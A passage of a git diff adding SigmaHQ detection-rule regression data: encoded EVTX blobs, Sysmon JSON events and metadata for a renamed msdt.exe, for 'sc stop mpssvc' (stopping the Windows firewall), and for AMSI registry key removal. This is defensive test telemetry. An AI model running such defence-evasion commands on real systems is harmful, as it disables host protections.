zauQ%MklJC*-H@^lauVttK~6%pAHnR^+mV2ENSAOg>e^Z`7p(I-`<4!Wy&&eIBVsPj zElHBEJr=?~!kicmFcA9gQ|e1IOAJPbm<{*wDE?yS=sKY;ax|~p_6Waj7ZY>wm<7a1z+L#7YDF z1@<4jtN=TlQWi)exP3pc6akxnG=k$D+#Vt@7hrxQ7La6sA%SneQYH2ziY-*K&nosO zT^z)Q`~s2}uqD{6WPelGk};c4^62(Y#rj0na&m!LSUqOJ0|0~8h5oJU(81=wECgmD zFbjcMD9J4BNH7cEK5^q03S}a;1!f^I3xQb(%tEkGdBkF&AQKT}A~YJTf=om?X5svr zF$;sj@8HoPi@$zX%)-r{S@^{It?d5dF$;lBV8@HVCX|x!DU=y-?PTqlu);LgLQcU? z`dhzKz$Sb}$Bzd#A+QO7O$cm4NjBl71e@^AAAj$uLN=i@unB=p2y8-N69StM*o1WR zC8iY%9znxm71#u?VR4PvgZ0p`VCA<{Oaij!NZx;0Y{I7_HsSee*ON_f77og3SQOi4 zaQ^(RqlH=?=%~-@Gh-#b(M5MMLvcTQC0BG@PrhJ%dM%Gqd00=$h)U^SEGYLG90Ge* zu#+d64rpE=1A+bn5(wCU$l07Y83ez-1bP?5ft7?Y`DEV;q%d5Lk!N66Q0yrXXHp6R zPJ|~MvVM@3KoWu{?6Ywq>p=SK2}&N(yg=duc@5H|-vlX$)suqo@S^?u1-!*qb^L7L zEdp;5c#FVWl;kbGmEbL2Y#fd879D}N2)sq$Edp;5c#FVW1l~d_6vljNb)+C36JOCF z*HyqY1_<_cO9um;$Mbj$<#9FEl>b}UgiU5+lxCBST8Tf$kCgdf3@ z1RMh#iL(s}hk+C>7#9VO^!hwUn|#|N(sUAKJ(6#=XYlAe(Ra8>+gH>uKHJH@Ps?VZRQ&~e61;? zx?<#*)fgh74F>AhTQlY%nW34{#RXl+r23`QwW!a$RHe4*vtTzKnUbGlI_|W_pN?zT zVJnh3b3#5l7h-4W)P)O8%G%tKx|k^zW76XP zhn1iA9<7&Z9;sn)!%%*sYeOn=>nnXH4OF`J7P<^GedkQ|IEzCi1hTRDL!@ua8MtUSsZ@Zr+d# F|9?f%CW8O~ literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json new file mode 100644 index 000000000..9ae6747df --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:32:00.478719Z" + } + }, + "EventRecordID": 256855, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:32:00.468", + "ProcessGuid": "5AB40FD1-3F40-68F9-4431-000000003B02", + "ProcessId": 2808, + "Image": "C:\\Users\\Administrator\\Downloads\\testdata\\renamed-msdt.exe", + "FileVersion": "10.0.20348.2849 (WinBuild.160101.0800)", + "Description": "Diagnostics Troubleshooting Wizard", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "msdt.exe", + "CommandLine": "renamed-msdt.exe", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=7C70F1DDC865BCFF963AD1CCFAA5E145,SHA256=377DD147174704790E2E981893E49FB72CE18133CF7E9E2EAA794ADF2F80D2DA,IMPHASH=9F0D1C67FCB6D4D5059556FF5E9A642B", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/info.yml b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/info.yml new file mode 100644 index 000000000..39305505b --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_renamed_msdt/info.yml @@ -0,0 +1,13 @@ +id: 0e26deb8-bbad-45fb-bb52-b5a2204ba626 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: bd1c6866-65fc-44b2-be51-5588fcff82b9 + title: Renamed Msdt.EXE Execution +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_renamed_msdt/bd1c6866-65fc-44b2-be51-5588fcff82b9.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx new file mode 100644 index 0000000000000000000000000000000000000000..b1c5e625a991122c5c1621b48aa0c5868502326c GIT binary patch literal 69632 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 E4@E>0G5`Po literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json new file mode 100644 index 000000000..c1b8abd09 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:33:27.276702Z" + } + }, + "EventRecordID": 256875, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:33:27.274", + "ProcessGuid": "5AB40FD1-3F97-68F9-5631-000000003B02", + "ProcessId": 3424, + "Image": "C:\\Windows\\System32\\sc.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Service Control Manager Configuration Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "sc.exe", + "CommandLine": "sc stop mpssvc", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=6FB10CD439B40D92935F8F6A0C99670A,SHA256=2BF663EA493CDC21AD33AEBD8DA40CC5D2AFA55E24F9E1BBF3D73E99DCADF693,IMPHASH=803254E010814E69947095A2725B2AFD", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls new file mode 100644 index 000000000..c1b8abd09 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:33:27.276702Z" + } + }, + "EventRecordID": 256875, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:33:27.274", + "ProcessGuid": "5AB40FD1-3F97-68F9-5631-000000003B02", + "ProcessId": 3424, + "Image": "C:\\Windows\\System32\\sc.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Service Control Manager Configuration Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "sc.exe", + "CommandLine": "sc stop mpssvc", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=6FB10CD439B40D92935F8F6A0C99670A,SHA256=2BF663EA493CDC21AD33AEBD8DA40CC5D2AFA55E24F9E1BBF3D73E99DCADF693,IMPHASH=803254E010814E69947095A2725B2AFD", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/info.yml b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/info.yml new file mode 100644 index 000000000..fafc9e989 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/info.yml @@ -0,0 +1,13 @@ +id: 81ea361b-6e7b-417c-8f70-abd288b10c35 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 81bcb81b-5b1f-474b-b373-52c871aaa7b1 + title: Stop Windows Service Via Sc.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx diff --git a/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx b/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx new file mode 100644 index 0000000000000000000000000000000000000000..cca37ccdfff7d21952e438ef3a44110fb71b6382 GIT binary patch literal 69632 zcmeHQYiu0Xbv`@$;PSCcQI>2~wj464ok%h%k`iB1WQpcWsz_U=C@VIIrW7A0CB90o zY$<9RC8=A$0qmrxfVl0C)D7Z196L?mCI|w!NMRUgVJl5tyLQtcKN@K1XKbl0hNGCU|9+DOiy%8&Yl$4y3hB0 zj+6ije6CVt-(Nj9wJhOf67V@QoBrr}Z?Y{hk&nbh{x>S}9}({rk;6E@7cj(1w-=YW z=LtNM+ZH^N+y6P~|JFIrbAO6+6IuN1!|z`@Aj#&eXUsUXc<)!8;{l}Y15M9(h2y+<@;XoLP`L{F;*qq-?GZwe%gxa@&&K7jdHMr*))-PP;A$)O zUbiqFIv7XO89=g6I4Ry9Df0;HpmgKf zhq1?4ZCXq0aB{$*6O-?!OIUA87lNTpV5{nNENiBY`3UGVs z=9t`t3}m)YM0{L`l%n$M_~F)^6Bpug2$#1!bjS&xP5zEv^&sO+y(7g%biAha3RDsfxX-j&;36Hb~L69ty6I=3D zvO+4z%R{)yZ4e%Rt5Uj5GV(EPIB~@~jC8%dP7SYkvqCySF$Kn1T2gpZn{Kj9s$*;v znC&gk)d(MLQ{p@2xhcWol1|Uy8Ezx;-Dk@20;dh*r_6)w>^(p}kefnYDqbmf%Iqi- zF5=JOA};Y5n^tD+LmhEQc+!!rD}ZFV#KWO=rZ}-N=JpvB(JrJMK|z`|d^6M5NhlIZ zr|&}owrb3{J+pBms2LOmGH2HnD;l~H_by1iQ(f!v#-qp<=4c9^qjC~gN&SA@(g3;4 z;T+35bK(v>z-^+x*bql%Gt*At4qLz?A3%zj+geZb$K)v9n9p|Jx=OAKN0K#C7m@Wy zih^l&lw)*f_B+O9qr{~KS5X0Q#62z*CLL}!=Ns{Bom9&Ke1AS%hcs3AbGCDCtNC-B z`bxFP+$~6k%|cb-7UiP{z_Y(8tCwRqHw%f(K{|_&k=-24;P)HO; z+f$ETe08Pw?=ZEJqM)qpGE2GIO?&IPheK{>!{bMuxbAS>^Se{mzuW!tx4<=1A&0+= zL-xtsxGaE|_#F zT%pEwK!@-m)wLuel~+*JI=RA_wGNxulD{+leh1~<7B^e z4mr?;G{aeCdDz!5?*xVH6o*ZzXZbv0y8LPIHH_lbgl9G4XnyJX;?ng7aLxAb0C?|5 zjp9@8l3qyg7~0W66wl!t^=uf|29WX~u4Z@Vi#T@{+_mBTn(*0*&mJR%c6?JFyKtsa zI&jp1zg~0o4jgskJn!p*RNC+aUin>o58f`Fr&hB2 z5hK~(kuK_C0Vyte6ck&EDW@f+V$lGql-qW2Fp6X55h&%%k76n9!uyOu*VuK%l*kkJ z)uGe@X}7EjPwkLXTV6_DmC%;>DW^-}uZ+Z5DyVRFTrs5yv=Xd?`EoAEk*)f={YC>y 